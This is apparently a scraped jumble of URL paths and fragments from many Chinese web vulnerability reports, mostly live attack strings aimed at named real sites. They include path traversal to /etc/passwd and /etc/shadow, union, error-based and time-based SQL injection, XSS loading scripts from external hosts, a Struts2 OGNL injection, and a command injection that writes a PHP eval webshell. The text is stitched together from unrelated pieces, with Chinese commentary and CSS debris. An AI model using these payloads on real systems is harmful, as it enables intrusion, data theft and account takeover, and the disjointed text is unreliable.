www.foundersc.com/wzweb/common/downloadAtt.action?attPath=../../../../../etc/passwd&infId=17488390&attType=application/txt&attNm=passwd&ei=VCnpUMG0E4iZkAXuoIGYBg&usg=AFQjCNGp4L_piA3IlzLFDXd0Yp-XceNFrg /showIndexArticlesAction.htm?recordType=2 /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /businessobjects/enterprise115/desktoplaunch/ /bmsh/ /microblog/create /vul/discuz_swfupload.swf /UserLoginAction.action /fckeditor/editor/filemanager/browser/default/browser.html?Connector=http%3A%2F%2Fe.jufuka.com%2Ffckeditor%2Feditor%2Ffilemanager%2Fconnectors%2Fphp%2Fconnector.php /apply.php /bj/bbs/ /searchgoods.do /points/pointsAction_mall.do /news/newsAction_getDetailsById.do /front/detailZ-getDetailZs.do /member/loginAction_toRegistPersonal.do /pc123/login.php /pc123/data/dump.sql-1 /shop/member!passwordRecover.action /soft/1279.htm 0px;scrollbar-face-color:buttonface;scrollbar-highlight-color:buttonface;scrollbar-shadow-color:buttonface;scrollbar-3dlight-color:buttonhighlight;scrollbar-arrow-color:#797979;scrollbar-track-color:#EEEEEE;scrollbar-darkshadow-color:buttonshadow 9pt;font-family buttonhighlight 18;border:1 buttonface ffffff;color:FF8000;text-align:center;width:8pt;height:8pt;corsur:hand 7pt;height:7pt none /opi/ /xxxxxxxxx/url/parse /&hostid=259069614&requestToken=-582841836&_rtk=a903886e /teladmin/ a.com/load.swf能够加载任意的swf,我直接打开http://a.com/load.swf?url=http://b.com/xss.swf,能不能执行脚本? String Object /swf/avatar.swf?jslang=alert(1) /xss.swf?a=alert&b=1 /xss.swf?a=alert(2)&b=1 /xss.swf?a= /vul/wan.360.cn_swf_avatar.swf /item.htm?spm=a1z0k.1000778.1000385.6.cUYUGK&scm=1007.61.0.0&id=16932942268&pvid=879bec5e-a7c3-4914-94c6-928b229ca3bf&ad_id=&am_id=&cm_id=&pm_id= /view/3581925.htm /s?q=%3Cimg+class%3D%E2%80%8B%22xsstest%22+title%3D%E2%80%8B%22%5Babcd%5D%E2%80%8B%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%22+src%3D%E2%80%8B%22x%22+onerror%3D%22alert%28%2Fxss%2F%29%22%3E&pq=%3Cimg+class%3D%E2%80%8B%22alignnone%22+title%3D%E2%80%8B%22%5Babcd%5D%E2%80%8B%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%E5%95%8A%22+src%3D%E2%80%8B%22x%22+onerror%3D%22alert%28%2Fxss%2F%29%22%3E&_xv=187&_re=0&src=srp / /group/search/?t=4&q=aa'/**/and/**/1=1%23 /group/search/?t=4&q=aa'/**/and/**/1=2%23 /group/search/?t=4&q=aa'/**/and/**/1=2/**/union/**/select/**/1,version(),3,4,5%23 /Setup/Default.aspx,没有做权限验证,任何用户都能访问。在这里可以重置任意用户的密码(昨天发现的,重置了管理员Administrator的密码登录了后台,今天发现已经没权限重置Administrator的密码了,但发现仍然可以重置普通用户的密码)。面临被清除所有用户的风险。 /index.action /appProjectInfo.action jypt.zpjy.net/go.action 8189/huanghai/long!getJianjie.action /mcategory.action /web/ShowIndex/action.do?headerState=2 /adc/download.do?filename=../WEB-INF/web.xml /adc/download.do?filename=../WEB-INF/ssb-config.xml /SSMN_ADMIN_WEB_V1.8.3/ /publicnotice/systemNoticeViewList.action url(xxx.jpg)去显示的淘宝店铺的logo。 www.taobao.com中logo处我们插入的css的效果。 / /go/act/readtown/admin.php /user/%2522%253E%253Cimg%2520src%253D1%2520onerror%253D%2522alert%28%252Fxss%252F%29%2522%253E&Refer=SUer_box /index.php?mod=search&act=findperson&schooltype=3&schoolid=81349&schoolname=%E5%8C%97%E4%BA%AC%E5%A4%A7%E5%AD%A61%3Chi%3E222%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E /reader#PageMgr.goIndexPage() /reader#PageMgr.goIndexPage(alert(/xss/)) /search?searchType=all&keyword=%22%3E%3C%73%63%72%69%70%74%2F%73%72%63%3D%68%74%74%70%3A%2F%2F%78%73%73%65%72%2E%6D%65%2F%57%36%58%5A%50%78%3F%31%33%35%33%30%37%33%33%32%34%3E%3C%2F%73%63%72%69%70%74%3E /huigu.php?paiqi=13 /huigu.php?paiqi=13 /content/1562说的很对,认证的信息没有将网站A的帐号A与第三方网站C的帐号C联系起来,截获的认证信息只能证明帐号C具有访问网站C的能力,所以网站A的帐号B,访问了截获的认证信息后,一样可以绑定到网站C的帐号C上,造成了账户劫持被利用。 /RenRen/Bind.aspx?_action=GetUser&data=%7b%22PkID%22%3a0%2c%22Code%22%3a0%2c%22CreateDate%22%3a%22%5c%2fDate(1357535393150)%5c%2f%22%2c%22LastModifyDate%22%3a%22%5c%2fDate(1357535393150)%5c%2f%22%2c%22ThirdPartySign%22%3a6%2c%22Other_UID%22%3a%22505316817%22%2c%22Other_Token%22%3a%22207023%7c6.0968a11612b566c72891194dfbfdb3f3.2592000.1360130400-505316817%22%2c%22Other_TokenSecret%22%3anull%2c%22Other_NickName%22%3a%22%e6%9d%9c%e8%85%be%22%2c%22Other_Gender%22%3a1%2c%22Other_Description%22%3anull%2c%22Other_Profile_Image_Url%22%3a%22http%3a%2f%2fhead.xiaonei.com%2fphotos%2f0%2f0%2fmen_head.gif%22%2c%22Other_Profile_Url%22%3anull%2c%22Other_Verified%22%3afalse%2c%22Other_CityID%22%3a0%2c%22Other_Location%22%3anull%2c%22Other_FollowersCount%22%3a0%2c%22Other_FriendsCount%22%3a0%2c%22Other_StatusesCount%22%3a0%2c%22Other_FavouritesCount%22%3a0%2c%22Other_CreateDate%22%3a%22%5c%2fDate(-62135596800000)%5c%2f%22%2c%22Other_LoginUser%22%3anull%2c%22Other_Password%22%3anull%2c%22IsRandomAccount%22%3a0%2c%22Oauth_Version%22%3a2%2c%22Other_Refresh_token%22%3anull%2c%22Expires_In%22%3a%22%5c%2fDate(1360130399150)%5c%2f%22%7d /dpool/sports/nba/index.php?action=boxscore.lists&host=1&refresh=0&back=imp&match_id=2012122910 /managerOneGgxxfb.action?fbxxid=52cd9ec922d03cb7012360294dbe0002 /home/plug.php?do=expert&ac=foreList&uid=65030&czid=2 /domain-admin/domainManage.net?IDDomain=11639876 /StyleList1.aspx?ID=1020000&parentID=1020000 /zp/teacher.aspx /portal/bizdesk/streamsvlt?imgType=jpg&showImg=1&url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fshadow /portal/bizdesk/streamsvlt?imgType=jpg&showImg=1&url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /cr/ksbm/prereg.action 40% /bbs/uploadimg/ /bbs/ /bbs/ /djykz/content.php?content=5983 /fckeditor/editor/fckeditor.html /upload_files/media/xxxxx.jpg /upload_files/media/xxxxx.jpg/shell.php /fckeditor/editor/filemanager/connectors/test.html /cli.cgi?cmd=echo%20账号:%;$poe_user%;echo%20密码:%;$poe_pass% /ajdrvzk/subjectOne/one!islogin.action www.crsp.org.cn /show.php?id=659 /upload1.aspx /meeting/MeetingNews!detail.action /group/129yo/edit/basic /ajaxCareFriend.do?uid=1981622273 /siteserver/login.aspx /talkbox.php?text=%E5%A4%A7%E7%A7%A6%E6%8A%A5%E6%96%99 /talkbox.php /bbs/bbs/bbs_index.action?id=275 /my_setting.php?action=outemail&bingEmail=********@qq.com / num3+1 /ft/question.fb?pid=3&cid=33518918&type=0&pno=1%22%3E%3Cimg%20src=1%20onerror=%22alert%28/xss/%29%22%3E%3Cscript%20src=http://xss.tw/762%3Ealert%281%29%3C/script%3E /RW5AQ /2011/03/other-reason-to-beware-of.html Event String Object /vul/wordpress_plupload.flash.swf /services/webhosting/newindex.asp //resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp /movie/47953 /feed /informationIntend/news/register.jsp /informationIntend/news/personal.jsp /informationIntend/fckeditor_2.6/editor/filemanager/browser/default/browser.html?Connector=connectors/jsp/connector /informationIntend/UserFiles/Image/test.jsp www.36kr.com时弹出对话框 /Destinations/Action/xcxtx_sc/pocket.asp?id=56 /EOMS_J2EE/ /EOMS_J2EE/ /CFR/ /EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=2012121111284296.doc&fileatt=2013年系统对外提供服务时间安排_2012121111284296.doc /EOMS_J2EE/infopub/manager/TawInformation/download.jsp?name=/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E 15392:0:99999:7 15392:0:99999:7 /upload/cards/ /user/logout.htm?goto=xxx /core/customer/aliyuntips /question.do?m=ask url.cn/BY3LeX /api/addfriendship/?uid= /api/addfriendship/?uid=1981622273 /plus/search.php?keyword= /user/info /user/userinfo.php /zhenaios/spRet.action /files/img.php?docid=2314287%df%27%20and%20%28select%201%20from%28select%20count%28*%29,concat%280x7c,%28select%20%28Select%20version%28%29%29%20from%20information_schema.tables%20limit%200,1%29,0x7c,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%20limit%200,1%29a%29%23 /files/img_new.php?docid=2366714%df%27 /weibozhuanfa.php?id=282355%20and%20exists%28select%20*%20from%20information_schema.TABLES%29%23 /expo3/single.php?id=113639 /jmx-console/ /。是一个JS基础库,提供一个可简单方便的实现各种扩展功能的JS库。这些并不重要。重要的是它提供了在线演示,直觉告诉我这肯定会有XSS漏洞,只是不知道会有多大权限而已,但是再不济也能获得一个baidu.com域名下的转向链接,绿勾的哦! /?m=frontData&a=demoEdit /页面,加载通讯录、短信、手机配置信息等都是Ajax /service/uc_contactAct/searchSimpleContact.jsonp /service/uc_contactAct/searchSimpleContact.jsonp?p0=%E5%85%A8%E9%83%A8%E8%81%94%E7%B3%BB%E4%BA%BA&p1=0&_=1357611733951&callback=a%3D /service/fm_smsAct/getSmsGroups.jsonp?p0=phone&p1=0&p2=10&_=1358057353920&callback=b%3D /service/fm_settingAct/getDeviceInfo.jsonp?_=1358057422226&callback=c%3D /profile.php?uid=1807689562&ref= /attention/aj_addfollow.php?uid=1981622273&fromuid= /jtec/portal/home/portal-home!infoShow.action?id=42,830 /mail-archive/web/oauth/current/msg09270.html /content/674 /order/registerInfo.htm?email=xxxx@xxx.com&code={code d27cdb6e-ae6d-11cf-96b8-444553540000 d27cdb6e-ae6d-11cf-96b8-444553540000 d27cdb6e-ae6d-11cf-96b8-444553540000 /feedback.htm /list?menuid=1 /index2.php?id=8776 /admin/index /admin/index/login /tianwang/admin/index/login /shop/admin/index/login /admin/index / /gmkt.inc/Member/ForgotMemberPwdSearch.aspx?p1=1j8D5pO_g_2_w我是隐藏部分hpSvQ_g_3__g_3_&p2=xxxxx@sina.com /gmkt.inc/Member/ForgotMemberPwdSearch.aspx?p1=T6W_g_2_vO0pyOBYOspiYmVW5w_g_3__g_3_ /cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||echo%20'%3C?php%20eval($_POST[cmd]);?%3E'%20%3E/app/usr/sbin/webui/html/svpn.php /cgi-bin/php-cgi/html/daemon/tsproxy.php?cmd=ifconfig||chmod https://www.tenpay.com/v2/iframe/msg/index.shtml?url=http://juhui.tenpay.com%252f@baidu.com/ /product/product/id/47 www.yokagames.com/product/product/?id=47 /ydadmin/window.asp /share/follow?followfrom=op.wz.gfo&keyfrom=op.wz.gfo&sitechannel=no&method=follow&screenName=【微博ID】 /p2/download.php?file=c:\windows\repair\system /gp/system_web/.svn/text-base/inc_connection.php.svn-base /gp/system_web/inc_connection.php.bak /gp/ckeditor/ /jobs/description/index.php?selid=188 /help/help.jsp www.qq.com也检查的差不多了。 http://www.qq.com:%2f%23@wooyun.org /order.html?gkey=&skey=&sqid=&dqid="/ /test.jsp /css/myquery/queryWQSBill.action?waybills=112821181021&verifycode= /css/myquery/queryWQSBill.action?waybills=112821181030&verifycode= /newhrm/login/login.aspx /share/retweet /public/accountMobileActive.jsp?msg=error&mobile=13xxxxxx /detail.do?ideaId=814 /store/apply.do /checkoutV3/receiver/saveReceiver.do?receiver.id=17731651 /?domain=qq.com /#qq.com /qqshow_v3/htdocs/live/popup/361/popup.html?domain=qq.com /ac/qqshow/qsfl/2_71/core.js这个js中我们找到了QSFL.excore.getURLParam函数,就是和我们猜测的一样。 /qqshow_v3/htdocs/live/popup/361/popup.html?domain=com /tmp/updateme/sinfor/ad/sys/sys_user.conf /backaudit.do?m=question /user/user_findEmailPassword.shtml?uuid=ff808081******************f25b1d0a9b /s_my_iphone_all_all_0_2#_0_0_1/ /s?key= /pp/?categoryID=101&date=2013-01-15&deviceid=1&type=3 / /ws/ykjcx/cxend.jsp?wen=36676eece664166e6252a1264d / /cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'and'1'='1 /cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'and'1'='2 /cgi/wpacgi/get_wpa_click_params.php?type=11&nameAccount=4000252578&dm=qq.com&cb=JSONP_CALLBACK_3&kfuin=4000252578'or%20version()%3E1%23 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /news_detail.jsp?newsid=601 /misc.php?mod=faq&action=search /106495/widget/bazaar/3522281/item/138859/ /106495/widget/bazaar/3522281/item/138859/edit xsser.me/xss?12345 /admin/admin.jsp /getlogin?oldps=&newpsd=wooyun&method=xgmm /getlogin?tel=138008008&email=麻花藤@qq.com&method=xggrxx /front/index.jsp) /front/pages/goodinfo.jsp?goodId=511203293788 /user/orderDetail.jspx?orderId=xxxxxx / /ebpn/click.html?aid=1000082335000100001&mc=0%5EC0%5EC1000082335000100001%5EC0%5EC0%5EC1%5EC100%5EC1358423062%5EC1000000_261508836%7C1%7C1989-01-01%7C24%7C2%7C0086610100000000%7C400000010011_0086610100000000%7C44%7C0%7C0%7C0086610100000000%5EC100000000060%5EC0%5EC%5EC%5EC-&refresh_source=3&refresh_idx=0&engine_type=&ref=http%3A%2F%2Fwww.renren.com%2Fhome&url=http%3A%2F%2Ftrack.yx.renren.com%2Fredirect%2F893%3Fabflag%3Dplay%26statID%3Dad_100000000060_1000082335000100001%26level%3D0 /bolt/campaign/campaignDetail.htm?campaignID=1000082335 act.news.qq.com/show_umodify.php mail.qq.com/cgi-bin/login?vt=passport&vm=wsk&delegate_url=得到sid。 /servlet/frontindex?deptIds=83 /rcc/pages/login.jsp /rcc/servlet/backstageMgrServlet?loginflag=T&pagetype=3&userid=1 /rcc/file.jsp /rcc/complaints_insert.jsp /images/ /third/insertTwitter /third/post.jsp?link=http%3A%2F%2Fyule.sohu.com%2F20130117%2Fn363726424.shtml&title=%E4%B8%93%E8%AE%BF%E5%91%A8%E6%98%9F%E9%A9%B0%EF%BC%9A%E5%A6%82%E6%9E%9C%E8%A7%82%E4%BC%97%E6%8E%A5%E5%8F%97%20%E6%88%91%E5%B0%B1%E7%BB%A7%E7%BB%AD%E5%90%83%E8%80%81%E6%9C%AC-%E6%90%9C%E7%8B%90%E5%A8%B1%E4%B9%90 url(#default#AnchorClick) alert(1) /front/news/newsframe.jsp?newsid=597 /json/GetVerifyCode.html?phone=13666xxxx&rc=验证码 /tickets/orderinfo.html?SerialId=T13011905550 /ajaxpostcards.php?next=1&prev=0&nowid=1%22 /attention/add?st=9301&uid=1768856242&rl=1&vt=1&wm=4007&gsid=3_5xxxxxxxxxxxxxxxxx /u/1768856242?vt=1&wm=4007&gsid=3_5xxxxxxxxxxx text/html /76/?keepsession=&location= /zjDyshd /forum.php?mod=misc&action=rate&ratesubmit=yes&infloat=yes&inajax=1formhash=3a0d2122&tid=111664&pid=1819715&referer=http%3A%2F%2Fdzs.gamebbs.qq.com%2Fforum.php%3Fmod%3Dviewthread%26tid%3D111664%26page%3D0%23pid1819715&handlekey=rate&score2=5&reason=%E6%94%AF%E6%8C%81%E5%8E%BB%E6%8E%89TP%EF%BC%81&ratesubmit=true[/img www.qq.com处理完之后,我们继续来看看这里的问题。 /services/service.php?m=exchange&a=good&id=10165&ex_num=-1 /exchange.php?action=show&id=10165 /expert/expertLogin/expertLogin_main.action /docs/funcspecs/2.jsp?sort=1&file=d:\ /login.action存在structs任意命令执行漏洞 /q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=&t1=all /q/go.php/vReport_List/kind/search/index.phtml?symbol=002698&orgname=&industry=&title=111111111%3C/script%3E%3Cscript%3Ealert%281%29%3C/script%3E&t1=all /zdy/page/lc600_sp.html?url=68397653_2202974785_Z0u3GCJuDm7K+l1lHz2stqkP7KQNt6nni2q2slWgIgZcQ0/XM5Gfat4O5y/TA9kEqDhAQpA8fPkg0h4 /go/getflashplayer /api/sinawebApi/outplayrefer.php/vid="+right+"/s.swf /zdy/page/lc600_sp.html?url=11 /gamecenter/tools/index.php www.xmgwbn.com / /s?deviceid=1&clienttype=2&key=1 /s_test_iphone_yiyao /.htaccess /info /touch/leavemsg.php?sid=3d41%22%3E%3Cscript%20src=http://localhost/test/dd.js%3E%3C/script%3E%3C%22 /Found/pagetop_2012.js PageTopLogIn();\ PageTopRegist();\ PageTopSignOut();\ /readnews.action /Zlcms/WebPublish/contentPage.action /web/template/web-articleInfo.action /kexie/tjsinfo/index/web_main.action /adservice/Web.config /login/nfyycms.do /view/50978/307535 /tracker/trackandtraceInit.do /tracker/trackandtraceInit.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) /tracker/trackandtraceInit.do?('\43_memberAccess.allowStaticMethodAccess')(a)=true&(b)(('\43context[\'xwork.MethodAccessor.denyMethodExecution\']\75false')(b))&('\43c')(('\43_memberAccess.excludeProperties\75@java.util.Collections@EMPTY_SET')(c))&(g) / /存在DEDE的注入 /plus/search.php?keyword=as&typeArr[111%3D@`\ /存在DEDE的SQL注射 /plus/search.php?keyword=as&typeArr[111%3D@`\ /存在SQL注射 /plus/search.php?keyword=as&typeArr[111%3D@`\ /cmsv55_jbdq/plus/search.php?keyword=as&typeArr[111%3D@`\ /iphone-yule/ /wiki/index.php?fulltext=Search&ns0=help&search=help&title=tianya /a可下载其部分源码。 /index2.php?id=8724 / / /plus/search.php?keyword=as&typeArr[111%3D@`\ /plus/search.php?keyword=as&typeArr[111%3D@`\ www.shopex.cn存在DEDE的SQL注射 /plus/search.php?keyword=as&typeArr[111%3D@`\ /curl.chinacache.com/usermanage.php /plus/search.php?keyword=as&typeArr[111%3D@`\ /plus/search.php?keyword=as&typeArr[111%3D@`\ /plus/search.php?keyword=as&typeArr[111%3D@`\ /plus/search.php?keyword=as&typeArr[111%3D@`\ /admin/newstext.asp?id=657 /admin/admin.asp /count.php?id=107 /app/hostapply.php?productid= /app/hostapply.php?productid=&bandtype=&count_id=0 /app/domainreg.php?productid=1'&type=0 /greenchannel_company.html?YTAG=2.1796620002 /?m=home&a=devlevel&level=normal_level&voteme=XXXXX&makesure=1[/img /?m=home&a=normal_developer_recommended_floatbox&email=xxxxxxx@qq.com /excel/(2012-2013-1)-0201005130-0201009-1cjhdd2.html /?m=home&a=devlevel&level=normal_level&voteme=XXXXX&makesure=1 /admin/uploadfile/2013/01/21/help.asp /wapLogin/getFlow.action /wapLogin/sendSms.action /wapLogin/getReal.action /productMessage/mealUseCase.action /BillDetails/getBillDetail.action /businessOperations/getAllValueAdds.action /businessOperations/BusOperInfo.action /businessOperations/handleBusiness.action /index.php?url=url /index.php?url=http://somesite/somepage /sompage的php代码为 /index.php?url=http://somesite/somepage /index.php?action=db /Detail.aspx?subjectID=693 / /flyiis/trainning/qryLTtrnlist.asp?x_T_TYPE=737&z_T_TYPE=%3D%2C%27%2C%27and%20%28select%20count%28u_name%29%20from%20tbladmin%29%3E0 /login.jsp.bak / /handbook/ /main/kaohe/kaohe.htm /management.asp /newsview.asp?id=-2881 /user/.svn/entries /web/ / /management.asp /papers/42)获取用户acckey和uid,即可登录用户账号了,看分析: /index.php?app=user&act=sessionJs /v4/js/footer.js中进行checklogin判断 /emall/SNMyEasilyBuyFormView?storeId=10052&catalogId=10051&easilyBuyId=6147511 /hotelpay-web/hotelTerminal/fnd/searchHotelOrders.htm?memberId=¤tPage=9&pageSize=15&orderStatusCriteria=&howLong=10 /vgs-web/mobile/oct/orderList.htm /vgs-web/mobile/oct/viewTraveller.htm /new/rleader.php?nid=12 /upload /index/manuscript?mid= /notification_message,随意填写收件人,在内容处存在xss,点击发送,则收件人收到私信,cookie被 / /qu / /zhaopin.php?id=6 /phpinfo.php /front/order_cancelOrder?orderNo=3xxxxxx /这个网址进入QQ空间,随便打开一个人的空间主页,地址格式如下http://qz.qq.com/QQ号码/home /uconsole/frame/index.action /siteserver/TextEditor/fckeditor/ /aj_baropen/support /?u=ddc05c /ky/bkylogin/bkyLogin-main.action /gnuboard/adm/member_list.php?sst=mb_intercept_date /gnuboard/adm/member_list.php?sst=mb_intercept_date music.sina.com.cn/yueku/js/mwp/feedPlayer.swf?vers=3),关键的代码逻辑如下: SoundBaseVO / /xss.swf /xss.swf namespace href=//******** /msg/send/6671203 href=http://xss.tw/989 /msg/send/6671203 namespace /989'&#x0022;&gt /ajax/json/shop/review?run=a&s=4550707&category=10&cityid=1&sa=Mo-Mo%E7%89%A7%E5%9C%BA&s1=0&s2=0&s3=0&ap=-1&body=%E7%8E%AF%E5%A2%83%E4%B8%8D%E9%94%99%EF%BC%8C%E5%BA%97%E9%9D%A2%E4%B9%9F%E5%BE%88%E5%A4%A7%EF%BC%8C%E7%94%A8%E5%B1%8F%E9%A3%8E%E9%9A%94%E5%87%BA%E4%B8%80%E4%B8%AA%E4%B8%AA%E5%B0%8F%E9%97%B4%E3%80%82%0A%E6%88%90%E4%BA%BA%E6%AF%8F%E4%BD%8D138%E5%85%83%EF%BC%8C1%E7%B1%B33%E4%BB%A5%E4%B8%8B%E7%9A%84%E5%B0%8F%E6%9C%8B%E5%8F%8B%E5%8D%8A%E4%BB%B7%E3%80%82%E9%A4%90%E5%89%8D%E6%9C%89%E4%B8%80%E4%BB%BD%E5%B0%8F%E9%A3%9F%EF%BC%8C%E5%8C%85%E6%8B%AC%E4%B8%80%E5%9D%97%E9%B8%A1%E8%82%89%E5%92%8C%E4%B8%80%E4%B8%AA%E5%AF%BF%E5%8F%B8%EF%BC%8C%E8%BF%98%E6%9C%89%E6%B3%A1%E8%8F%9C%E3%80%82%0A%E7%82%B9%E4%BA%86%E5%AF%BF%E5%96%9C%E9%94%85%E3%80%81%E7%89%9B%E8%82%A9%E8%82%89%E3%80%81%E7%89%9B%E4%BA%94%E8%8A%B1%E8%82%89%E3%80%81%E4%BA%94%E8%8A%B1%E8%82%89%E3%80%81%E7%BE%8A%E8%82%89%E3%80%81%E9%AD%94%E8%8A%8B%E4%B8%9D%E7%AD%89%E3%80%82%E8%94%AC%E8%8F%9C%E3%80%81%E8%B1%86%E5%88%B6%E5%93%81%E7%B1%BB%E7%9A%84%E6%98%AF%E5%90%83%E5%88%B0%E4%B8%80%E5%8D%8A%E6%97%B6%EF%BC%8C%E6%9C%8D%E5%8A%A1%E5%91%98%E6%8E%A8%E4%B8%AA%E5%B0%8F%E8%BD%A6%E8%BF%9B%E6%9D%A5%E7%BB%99%E4%BD%A0%E5%8A%A0%E7%9A%84%E3%80%82%E8%82%89%E7%B1%BB%E7%9A%84%E9%83%BD%E9%9D%9E%E5%B8%B8%E5%AB%A9%EF%BC%8C%E5%BE%88%E5%A5%BD%E5%90%83%E3%80%82&dtag=&stag=&park=&ctitle=&setag=false&tap=true&s4=1&cat=false&tuangou=false&star=10&m101=0&keyList=m101&sina_sync=2&qzone_sync=2&sohu_sync=2 /index.php /news.php?id=66此处存在.....然后很不幸的猜到了后台http://mobile.8684.cn/adm/index.php,当然,管理员的密码是很简单的 /m/ /history.show.php?jid=10557 /history.show.php?jid=10557 /back/Links/shownews1.jsp?maxpages=4&size=2&color=6A822D&maxpages1=6&size1=2&color1=black&isbold=bold&isSort=no&catalogFlag=commend_list /dodonew/front/userCenter/index.jsp?dodoId=12121232 /res/images/uploader.swf /res/images/uploader.swf?jsobject=alert(1) www.huanbo99.com)开发的 /res/js/dev/util_libs/swfupload/Flash/swfupload.swf /files/118059/SWF-Upload-Cross-Site-Scripting.html /res/js/dev/util_libs/swfupload/Flash/swfupload.swf?movieName= /Student/My/Login.aspx?ReturnURL=http%3a%2f%2fcampus.nokia.com.cn%2fStudent%2fMy%2fapply.aspx /res/js/dev/util_libs/jPlayer/Jplayer.swf /res/js/dev/util_libs/jPlayer/Jplayer.swf?jQuery=alert(1) /res/js/dev/util_libs/jPlayer/Jplayer.swf?id= /fjgl%5CfjglCRE259891349927902199.jsp?sort=1&file= / h.lesuke.com/contract_downloadEbook.do?displayName=1797f10f5513435f81432cd174cdff6e.php&ebookUrl=/../../../../../etc/passwd /profile/order/filter/single/id/9165315 /toexcel_PrintDialog.aspx?kc=此处填写课程代码&tab=jxrwb_lsb&psb=30&qzb=0&qmb=70&syb=0&cjxn=2012-2013&cjxq=1&kclx=必修课 /ajaxv2/user/addRelation /aj/trialmember/uploadurltext /login.asp language=cn /play/ad0761084a7302768e9939f3?pn=1&rn=50 /spgbid/homeAction/searchAction.action?search=search&msg= /relationship/bulkfollow.php?language=zh_cn&uids=2074219121&wide=1&color=C2D9F2,FFFFFF,0082CB,666666&showtitle=1&showinfo=1&sense=0&verified=1&count=5&refer='+encodeURIComponent(location.href)+'&dpc=1 /HTML/News/Tender.aspx?MenuID=5 /webmaster/aspx.aspx /xz/student_list.asp /MemberInfo/address/act/add_edit/address_id/1373489 /MemberInfo/address/act/del_address/address_id/1373489 /MemberInfo/info/type/3/act/sel/roleid/9056 /MemberInfo/info/type/3/act/del/roleid/9056 /xz/student_list.asp title=%'&age=0 /details.asp /register.action?agencyId=42302 /cgi-bin/CommNews/news_click.cgi?iPdName=1&fid=36886-sleep(5) /cgi-bin/CommNews/news_click.cgi?iPdName=1&fid=36886-sleep(10) /cgi-bin/CommNews/news_click.cgi?iPdName=1&fid=36886-sleep(15) /pg/pg_list.asp?action=list /pg/pg_list.asp?action=list?bbyz=aaa /home/backup/multibak_20111023150416_7.sql /home/backup/ /openinfo/gongDianSubUnit.action?unitid=9783&catalogid=13943 /toIndexHomeUsers.action /portal/event/61 /php_cgi/lol_club/pop_short.php?type=12&page=1&rd=0.06736766834528884¶=a%3E%3E%3E%3Cimg%20src=1%20onerror=alert%281%29%3E%3C%3C%3C /badoo/opinion/gbolwl /webcrm/jfdj/productinfo.aspx?productcode=01100201058%27 /space-693256254-do-blog-id-1140804.html 5px /4310VB?'+Math.random();document.body.appendChild(s) /82248039/3 30px;overflow-y:auto;width:100px #t /friend.php?w=d /?member-数字编号-reply-message.html /?member-9-reply-message.html /?member- / /system/manager/terminalLogin.do /315/tousu/ /webhosting/cp/f10_sqltools_done.php /webhosting/cp/f10_sqltools_done.php /webmaster/admin.aspx /qipu/qfgo/show.asp?qipuid=27157%22%20onmouseover%3dprompt(923700)%20bad%3d%22 /qipu/qipumain.asp?Do=Search&P1=-1'%20or%2049%20%3d%20'49 /qipu/qipumain.asp?Do=Search&P1='%2b /test.asp /mail/resetPassword.action?actionType=index)。 /?member-1794-modifyReceiver.html /?member-1794-modifyReceiver.html /?member-1794-delRec.html /?member-1794-2-setDefault.html /shop/member!passwordRecover.action /upExpert.php?expert=2 /upExpert.php?expert=2 /就会造成异常,目测是因为用此数据构造查询请求导致的 /a.php /abc/robots.txt /phpmyadmin/6.php /report/message/5367000 /safe/mod_pwd?kcode=aaaaaaaaaaaaaaaaaaa&tcode=bbbbbbbbbb /tcmiddleapi/hotel/orderhandler.ashx /tcmiddleapi/hotel/orderhandler.ashx /MobileAPI/flight/orderhandler.ashx /MobileAPI/flight/orderhandler.ashx /MobileAPI/general/contactHandler.ashx /MobileAPI/flight/orderhandler.ashx /MobileAPI/General/ReciverHandler.ashx /phpmywind/admin/) /phpmywind/admin/),轻轻一按回车,全自动登录,无需帐号密码。 /ruwei_vote.php?id=1 /wxcs/mains.html?citycode=440500注册后可使用电费查询服务,只要绑定就可以轻松获得用户信息,而且供电局在连接移动平台时未经用户授权。其移动无线城市也未尽到审核用户是否真实,如户号增加姓名来判断是较为安全,仅凭户号即可轻松获得电费信息的邮件存在较大的安全隐患。 /bingli/bldelete/ID.htm?_=1359187495833 /calisnew/allacad.asp?id=m /pay/topay.net?IDAAction=5437730 /pay/topay.net?IDAAction=5437730 /admin/login.php 